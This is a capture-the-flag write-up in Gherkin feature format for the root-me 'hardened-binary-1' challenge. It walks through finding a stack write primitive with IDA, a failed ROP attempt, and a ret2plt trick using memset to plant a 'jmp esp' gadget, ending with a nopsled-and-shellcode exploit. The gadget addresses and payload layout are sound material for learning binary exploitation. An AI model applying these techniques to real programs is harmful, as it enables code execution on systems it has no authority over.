## Version 2.0
## language: en

Feature: hardened-binary-1
  Site:
    root-me
  Category:
    app-systeme
  User:
    m'baku
  Goal:
    Get shell and read the password

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | gdb-pwndbg      | 1.1.0     |
    | VMware          | 15.5.6    |
    | IDA             | 7.2       |
    | ropper          | 1.13.5    |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see the environment configuration
    """
    PIE: disabled
    Relro: read only
    NX: disabled (heap and stack)
    ASLR: enable
    SF: disable
    SSP: enable
    SRC: disabled
    """

  Scenario: Success: Analyzing the binary
    Given the source code is not provided
    Then I analyze the binary with IDA disassembler [evidences](ida.png)
    And I didn't find any common vulnerabilities like BoF or use-after-free
    When I analyzed the insert function
    And what this function does is take the first line of the file
    """
    [stack + offset] = value
    """
    And save it in a stack pointer + offset of the second line
    Then I noticed a write primitive [evidences](writep.png) in the stack
    """
    0x08048534 push  ebp
    0x08048535 mov   ebp, esp
    0x08048537 sub   esp, 28h
    0x0804853A mov   eax, [ebp+arg_0]
    0x0804853D mov   [ebp+var_1C], eax
    0x08048540 mov   eax, [ebp+arg_4]
    0x08048543 mov   [ebp+var_20], eax
    0x08048546 mov   eax, [ebp+arg_8]
    0x08048549 mov   [ebp+var_24], eax
    0x0804854C mov   eax, large gs:14h
    0x08048552 mov   [ebp+canary], eax
    0x08048555 xor   eax, eax
    0x08048557 mov   eax, [ebp+var_1C]
    0x0804855A shl   eax, 2
    0x0804855D add   eax, [ebp+var_24]
    0x08048560 mov   edx, [ebp+var_20]
    0x08048563 mov   [eax], edx        ; write primitive
    0x08048565 mov   eax, [ebp+canary]
    0x08048568 xor   eax, large gs:14h
    0x0804856F jz    short locret_8048576
    """
    And with this I could write values to an arbitrary address on the stack

  Scenario: Fail:Exploiting the bug with ROP
    Given I identify a write primitive (bug) in the insert function
    Then my idea is to assign values to the return address
    And perform a Return Orienten Programming in this way
    Then I found that the offset to the return is "1033"
    And since the stack is executable
    Then it would just look for a gadget to jump to esp
    And  put a shellcode there I used ropper to find gadgets
    """
    $ ropper --file ch21
    0x08048784: pop ecx; pop ebx; leave; ret;
    0x08048737: pop edi; pop ebp; ret;
    0x08048736: pop esi; pop edi; pop ebp; ret;
    0x08048761: push dword ptr [ebp - 0xc]; add esp, 4; pop ebx; pop ebp; ret;
    0x080486d0: push ebp; mov ebp, esp; pop ebp; ret;
    0x08048530: ror cl, 1; ret;
    0x0804873b: sbb al, 0x24; ret;
    ...
    0x08048734: sbb al, 0x5b; pop esi; pop edi; pop ebp; ret;
    0x08048758: sub ebx, 4; call eax;
    0x08048569: xor eax, dword ptr [0x14]; je 0x576; call 0x444; leave; ret;
    0x08048568: xor eax, dword ptr gs:[0x14]; je 0x576; call 0x444; leave; ret;
    0x080486b6: xor edx, dword ptr [0x14]; je 0x6c3; call 0x444; leave; ret;
    0x080486b5: xor edx, dword ptr gs:[0x14]; je 0x6c3; call 0x444; leave; ret;
    0x08048763: hlt; add esp, 4; pop ebx; pop ebp; ret;
    0x080483c1: leave; ret;
    0x080486cf: nop; push ebp; mov ebp, esp; pop ebp; ret;
    0x08048757: nop; sub ebx, 4; call eax;
    0x080486ce: nop; nop; push ebp; mov ebp, esp; pop ebp; ret;
    0x080483c2: ret;
    0x0804852c: sahf; add al, 8; call eax;
    0x0804852c: sahf; add al, 8; call eax; leave; ret;
    0x08048753: sahf; add al, 8; nop; sub ebx, 4; call eax;
    """
    And I found no useful gadget for this approach

  Scenario: Fail:Exploiting the bug with ret2plt + shellcode
    Given there is no gadget to jump on the stack (jmp esp or call esp)
    And memset function is present in the binary
    Then my idea was to use this function to set a "jmp esp" gadget in data
    And then jump to this pointer in data
    """
    write_in_address(1033, 134513652)     # memset@plt
    write_in_address(1034, 134514486)     # pop esi; pop edi; pop ebp; ret;
    write_in_address(1035, 134521123)     # @.data
    write_in_address(1036, 255)           # 0xff
    write_in_address(1037, 1)
    write_in_address(1038, 134513652)     # memset@plt
    write_in_address(1039, 134514486)     # pop esi; pop edi; pop ebp; ret;
    write_in_address(1040, 134521123 + 1) # @.data + 1
    write_in_address(1041, 228)           # 0xe4
    write_in_address(1042, 1)
    write_in_address(1043, 134521123) # @.data
    """
    Then what I did was a ret2plt to execute something like this:
    """
    char *data_writable[];
    memset(data_writable, "\xff", 1);
    memset(data_writable + 1, "\xe4", 1);
    """
    And 0xffe4 is the opcode of the instruction: "jmp esp"
    Then jump to this address (data_writable) which points to jmp esp
    And finally use the write primitive to put the shellcode on the stack
    Then this worked while debugging but outside I got sigsegv error
    """
    $ ./ch21 file
    Segmentation fault (core dumped)
    """ [evidences](sigsev.png)

  Scenario: Success:Exploiting the bug with ret2plt + nopsled + shellcode
    Given I get to run shell inside GDB
    Then I have to find a way to make the exploit more reliable
    Then this behavior is due that the stack can vary within GDB
    And environment variables are very influential on this
    Then the stack may vary but the offset does not
    And a common way to solve this problem is to use a nopsleed
    """
    nopsleed = 0x90909090 (0x90 NOP)
    """
    Then the nopsleed is used to drop the return somewhere within this range
    And since a NOP does not execute any operation
    Then it could execute many until reaching the shellcode
    """
    payload = 0x90909090
    payload += 0x90909090
    ...
    ...
    payload += 0x90909090
    payload += shellcode
    """
    And voila, this way I could reliably exploit the binary
